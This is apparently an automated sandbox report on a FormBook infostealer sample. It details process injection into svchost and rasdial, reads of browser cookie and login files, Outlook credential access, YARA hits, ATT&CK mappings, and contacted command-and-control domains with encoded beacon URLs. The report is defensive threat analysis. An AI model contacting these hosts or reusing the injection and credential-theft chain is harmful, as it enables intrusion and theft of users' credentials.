            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\rasdial.exeThread register set: target process: 8144Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\rasdial.exeThread APC queued: target process: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\031215-Revised-01.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 24AE008Jump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000D1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_000D1201
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000B2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_000B2BA5
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000DB226 SendInput,keybd_event,0_2_000DB226
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000F22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_000F22DA
            Source: C:\Users\user\Desktop\031215-Revised-01.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\031215-Revised-01.exe"Jump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000D0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_000D0B62
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000D1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_000D1663
            Source: 031215-Revised-01.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: 031215-Revised-01.exe, EsAzcOtjoknfjP.exe, 00000005.00000000.2005994727.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519301635.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2154984442.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: EsAzcOtjoknfjP.exe, 00000005.00000000.2005994727.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519301635.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2154984442.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: EsAzcOtjoknfjP.exe, 00000005.00000000.2005994727.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519301635.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2154984442.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: EsAzcOtjoknfjP.exe, 00000005.00000000.2005994727.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519301635.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2154984442.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00090698 cpuid 0_2_00090698
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_000E8195
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000CD27A GetUserNameW,0_2_000CD27A
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000ABB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_000ABB6F
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000742DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: 031215-Revised-01.exeBinary or memory string: WIN_81
            Source: 031215-Revised-01.exeBinary or memory string: WIN_XP
            Source: 031215-Revised-01.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: 031215-Revised-01.exeBinary or memory string: WIN_XPe
            Source: 031215-Revised-01.exeBinary or memory string: WIN_VISTA
            Source: 031215-Revised-01.exeBinary or memory string: WIN_7
            Source: 031215-Revised-01.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000F1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_000F1204
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000F1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_000F1806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499198 Sample: 031215-Revised-01.exe Startdate: 26/08/2024 Architecture: WINDOWS Score: 100 28 www.jaxo.xyz 2->28 30 www.weep.site 2->30 32 11 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 031215-Revised-01.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 EsAzcOtjoknfjP.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 rasdial.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 EsAzcOtjoknfjP.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.jaxo.xyz 66.29.149.180, 49755, 49756, 49757 ADVANTAGECOMUS United States 22->34 36 www.xforum.tech 103.224.182.242, 49759, 49760, 49761 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            031215-Revised-01.exe37%ReversingLabs
            031215-Revised-01.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://api.w.org/0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            http://www.ayypromo.shop0%Avira URL Cloudsafe
            https://tilda.cc0%Avira URL Cloudsafe
            https://mgmasistencia.com/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%Avira URL Cloudsafe
            http://www.cannulafactory.top/l90v/0%Avira URL Cloudsafe
            https://mgmasistencia.com/acerca-de/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.40%Avira URL Cloudsafe
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%Avira URL Cloudsafe
            https://twitter.com/wordpress0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/?kZr0=ht-lElyh&3L9l=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.40%Avira URL Cloudsafe
            http://www.ayypromo.shop/rgqx/0%Avira URL Cloudsafe
            https://es.wordpress.org/0%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/0%Avira URL Cloudsafe
            https://mgmasistencia.com/blog/0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/0%Avira URL Cloudsafe
            http://www.ayypromo.shop/rgqx/?3L9l=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/0%Avira URL Cloudsafe
            http://www.onlytradez.club/zctj/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.40%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.40%Avira URL Cloudsafe
            https://mgmasistencia.com/wp-json/0%Avira URL Cloudsafe
            https://mgmasistencia.com/comments/feed/0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/?3L9l=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            http://www.cannulafactory.top/l90v/?3L9l=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            http://www.onlytradez.club/zctj/?3L9l=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            http://www.88nn.pro/l4rw/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg0%Avira URL Cloudsafe
            https://mgmasistencia.com/contacto/0%Avira URL Cloudsafe
            http://www.weep.site/v1m8/?3L9l=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&kZr0=ht-lElyh100%Avira URL Cloudmalware
            http://www.xforum.tech/647x/?3L9l=FnaXBox540%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.jaxo.xyz/f9bc/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.40%Avira URL Cloudsafe
            http://www.88nn.pro/l4rw/?3L9l=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            https://mgmasistencia.com/feed/0%Avira URL Cloudsafe
            http://www.redhat.com/docs/manuals/enterprise/0%Avira URL Cloudsafe
            https://wordpress.org/0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/0%Avira URL Cloudsafe
            https://mgmasistencia.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-10%Avira URL Cloudsafe
            http://www.redhat.com/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.ayypromo.shop
            		176.57.64.102
            		truefalse
              		unknown
              fontanerourgente.net
              		37.187.158.211
              		truefalse
                		unknown
                www.jaxo.xyz
                		66.29.149.180
                		truetrue
                  		unknown
                  weep.site
                  		194.233.65.154
                  		truefalse
                    		unknown
                    32wxd.top
                    		206.119.82.116
                    		truefalse
                      		unknown
                      www.cannulafactory.top
                      		18.183.3.45
                      		truefalse
                        		unknown
                        www.onlytradez.club
                        		167.172.133.32
                        		truefalse
                          		unknown
                          www.88nn.pro
                          		45.157.69.194
                          		truefalse
                            		unknown
                            www.xforum.tech
                            		103.224.182.242
                            		truefalse
                              		unknown
                              www.weep.site
                              		unknown
                              		unknowntrue
                                		unknown
                                www.taapbit.online
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.fontanerourgente.net
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.32wxd.top
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.xforum.tech/647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.cannulafactory.top/l90v/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.ayypromo.shop/rgqx/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.32wxd.top/kyiu/?kZr0=ht-lElyh&3L9l=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.xforum.tech/647x/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.ayypromo.shop/rgqx/?3L9l=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.onlytradez.club/zctj/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.32wxd.top/kyiu/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.onlytradez.club/zctj/?3L9l=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontanerourgente.net/t3gh/?3L9l=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.cannulafactory.top/l90v/?3L9l=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.88nn.pro/l4rw/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.weep.site/v1m8/?3L9l=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.88nn.pro/l4rw/?3L9l=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      		unknown
